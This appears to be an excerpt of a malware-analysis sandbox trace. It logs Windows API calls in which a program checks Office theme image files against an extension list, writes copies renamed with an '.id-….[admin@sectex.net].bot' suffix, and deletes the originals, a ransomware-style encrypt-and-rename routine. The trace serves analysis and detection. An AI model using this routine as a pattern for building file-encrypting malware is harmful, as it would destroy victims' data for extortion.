	[0045.174] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.174] lstrlenW (lpString=".ppt") returned 4
	[0045.174] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.174] lstrlenW (lpString=".zip") returned 4
	[0045.174] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.174] lstrlenW (lpString=".rar") returned 4
	[0045.174] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.174] lstrlenW (lpString=".bz2") returned 4
	[0045.174] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.174] lstrlenW (lpString=".7z") returned 3
	[0045.174] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.174] lstrlenW (lpString=".dbf") returned 4
	[0045.174] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.174] lstrlenW (lpString=".1cd") returned 4
	[0045.174] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.174] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 76
	[0045.174] lstrlenW (lpString=".jpg") returned 4
	[0045.174] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.174] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.174] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.175] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1666) returned 1
	[0045.175] CloseHandle (hObject=0x1f8) returned 1
	[0045.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 0x20
	[0045.175] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.176] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.176] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.177] GetLastError () returned 0x0
	[0045.177] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x682, lpOverlapped=0x0) returned 1
	[0045.179] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x690, lpOverlapped=0x0) returned 1
	[0045.180] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.180] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.180] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.180] CloseHandle (hObject=0x1fc) returned 1
	[0045.180] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.180] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.181] CloseHandle (hObject=0x1f8) returned 1
	[0045.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.182] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif")) returned 1
	[0045.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.182] lstrlenW (lpString=".doc") returned 4
	[0045.182] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.182] lstrlenW (lpString=".docx") returned 5
	[0045.182] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.182] lstrlenW (lpString=".pdf") returned 4
	[0045.182] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.182] lstrlenW (lpString=".xls") returned 4
	[0045.182] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.182] lstrlenW (lpString=".xlsx") returned 5
	[0045.182] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.182] lstrlenW (lpString=".ppt") returned 4
	[0045.182] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.182] lstrlenW (lpString=".zip") returned 4
	[0045.182] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.182] lstrlenW (lpString=".rar") returned 4
	[0045.182] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.182] lstrlenW (lpString=".bz2") returned 4
	[0045.182] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.182] lstrlenW (lpString=".7z") returned 3
	[0045.182] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.182] lstrlenW (lpString=".dbf") returned 4
	[0045.182] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.182] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".1cd") returned 4
	[0045.183] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".jpg") returned 4
	[0045.183] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".doc") returned 4
	[0045.183] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.183] lstrlenW (lpString=".docx") returned 5
	[0045.183] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.183] lstrlenW (lpString=".pdf") returned 4
	[0045.183] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString=".xls") returned 4
	[0045.183] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString=".xlsx") returned 5
	[0045.183] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.183] lstrlenW (lpString=".ppt") returned 4
	[0045.183] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".zip") returned 4
	[0045.183] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString=".rar") returned 4
	[0045.183] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.183] lstrlenW (lpString=".bz2") returned 4
	[0045.183] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.183] lstrlenW (lpString=".7z") returned 3
	[0045.183] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".dbf") returned 4
	[0045.183] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.183] lstrlenW (lpString=".1cd") returned 4
	[0045.183] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.183] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 74
	[0045.184] lstrlenW (lpString=".jpg") returned 4
	[0045.184] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.184] lstrcmpiW (lpString1=".PNG", lpString2=".bot") returned 1
	[0045.184] lstrlenW (lpString="THMBNAIL.PNG") returned 12
	[0045.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.184] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=19563) returned 1
	[0045.184] CloseHandle (hObject=0x1f8) returned 1
	[0045.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20
	[0045.184] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.184] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.184] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.184] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.185] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.185] GetLastError () returned 0x0
	[0045.185] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x4c6b, lpOverlapped=0x0) returned 1
	[0045.188] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4c70, lpOverlapped=0x0) returned 1
	[0045.189] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.189] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0045.189] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.190] CloseHandle (hObject=0x1fc) returned 1
	[0045.190] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.190] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.191] CloseHandle (hObject=0x1f8) returned 1
	[0045.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.191] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1
	[0045.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.191] lstrlenW (lpString=".doc") returned 4
	[0045.191] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.191] lstrlenW (lpString=".docx") returned 5
	[0045.191] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.191] lstrlenW (lpString=".pdf") returned 4
	[0045.191] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.191] lstrlenW (lpString=".xls") returned 4
	[0045.191] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.191] lstrlenW (lpString=".xlsx") returned 5
	[0045.191] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.191] lstrlenW (lpString=".ppt") returned 4
	[0045.191] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.191] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.191] lstrlenW (lpString=".zip") returned 4
	[0045.191] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.191] lstrlenW (lpString=".rar") returned 4
	[0045.191] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.192] lstrlenW (lpString=".bz2") returned 4
	[0045.192] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString=".7z") returned 3
	[0045.192] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString=".dbf") returned 4
	[0045.192] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString=".1cd") returned 4
	[0045.192] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString=".jpg") returned 4
	[0045.192] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString=".doc") returned 4
	[0045.192] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString=".docx") returned 5
	[0045.192] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1
	[0045.192] lstrlenW (lpString=".pdf") returned 4
	[0045.192] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString=".xls") returned 4
	[0045.192] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1
	[0045.192] lstrlenW (lpString=".xlsx") returned 5
	[0045.192] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1
	[0045.192] lstrlenW (lpString=".ppt") returned 4
	[0045.192] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1
	[0045.192] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.192] lstrlenW (lpString=".zip") returned 4
	[0045.192] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1
	[0045.192] lstrlenW (lpString=".rar") returned 4
	[0045.192] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1
	[0045.192] lstrlenW (lpString=".bz2") returned 4
	[0045.192] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1
	[0045.192] lstrlenW (lpString=".7z") returned 3
	[0045.193] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1
	[0045.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.193] lstrlenW (lpString=".dbf") returned 4
	[0045.193] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1
	[0045.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.193] lstrlenW (lpString=".1cd") returned 4
	[0045.193] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1
	[0045.193] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75
	[0045.193] lstrlenW (lpString=".jpg") returned 4
	[0045.193] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1
	[0045.193] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0045.193] lstrlenW (lpString="PREVIEW.GIF") returned 11
	[0045.193] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.193] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1423) returned 1
	[0045.193] CloseHandle (hObject=0x1f8) returned 1
	[0045.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 0x20
	[0045.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0045.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0045.194] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.194] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.194] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0045.195] GetLastError () returned 0x0
	[0045.195] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x58f, lpOverlapped=0x0) returned 1
	[0045.197] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x590, lpOverlapped=0x0) returned 1
	[0045.198] ReadFile (in: hFile=0x1f8, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0045.198] WriteFile (in: hFile=0x1fc, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0045.198] SetEndOfFile (hFile=0x1fc) returned 1
	[0045.198] CloseHandle (hObject=0x1fc) returned 1
	[0045.198] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0045.198] SetEndOfFile (hFile=0x1f8) returned 1
	[0045.199] CloseHandle (hObject=0x1f8) returned 1
	[0045.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0045.199] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\preview.gif")) returned 1
	[0045.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.199] lstrlenW (lpString=".doc") returned 4
	[0045.200] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0045.200] lstrlenW (lpString=".docx") returned 5
	[0045.200] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1
	[0045.200] lstrlenW (lpString=".pdf") returned 4
	[0045.200] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0045.200] lstrlenW (lpString=".xls") returned 4
	[0045.200] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0045.200] lstrlenW (lpString=".xlsx") returned 5
	[0045.200] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1
	[0045.200] lstrlenW (lpString=".ppt") returned 4
	[0045.200] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0045.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.200] lstrlenW (lpString=".zip") returned 4
	[0045.200] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0045.200] lstrlenW (lpString=".rar") returned 4
	[0045.200] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0045.200] lstrlenW (lpString=".bz2") returned 4
	[0045.200] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0045.200] lstrlenW (lpString=".7z") returned 3
	[0045.200] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0045.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.200] lstrlenW (lpString=".dbf") returned 4
	[0045.200] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0045.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.200] lstrlenW (lpString=".1cd") returned 4
	[0045.200] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0045.200] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.200] lstrlenW (lpString=".jpg") returned 4
	[0045.200] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\PREVIEW.GIF") returned 75
	[0045.201] lstrlenW (lpString=".doc") returned 4
